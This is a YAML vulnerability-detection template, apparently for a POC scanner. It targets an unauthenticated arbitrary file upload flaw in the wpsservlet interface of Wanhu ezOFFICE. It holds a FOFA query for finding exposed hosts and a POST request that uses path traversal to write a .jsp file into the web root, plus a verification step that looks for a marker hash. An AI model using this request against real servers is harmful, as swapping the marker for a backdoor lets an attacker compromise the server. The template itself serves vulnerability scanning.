product: 万户网络ezOFFICE
vName: 万户-ezOFFICE wpsservlet接口任意文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 万户ezOFFICE协同管理平台wpsservlet接口处存在任意文件上传漏洞，未经身份认证的攻击者可以通过此漏洞上传恶意后门文件，造成代码执行或服务器失陷。
version: ''
note: ''
search:
  FOFA: app="万户网络-ezOFFICE"
protocol: http
link: https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247484728&idx=1&sn=856c915c6857c9c2737293a1ec3ced9d&chksm=974b883fa03c012987b27eba9a2e524ff596fd2dbb9b216676d5777ed5989d254fae074f3863&scene=178&cur_album_id=2873032428486115330#rd
fix:
  - 厂商尚未提供漏洞修补方案，请关注厂商主页及时更新： http://www.whir.net
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /defaultroot/wpsservlet?option=saveNewFile&newdocId=40067&dir=../platform/portal/layout/&fileType=.jsp
      file:
        NewFile:
          - 52e039302a62d077.jsp
          - 95cc64dd2825f9df13ec4ad683ecf339
    verify:
      path: /defaultroot/platform/portal/layout/52e039302a62d077.jsp
      logic: and
      check:
        - body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: and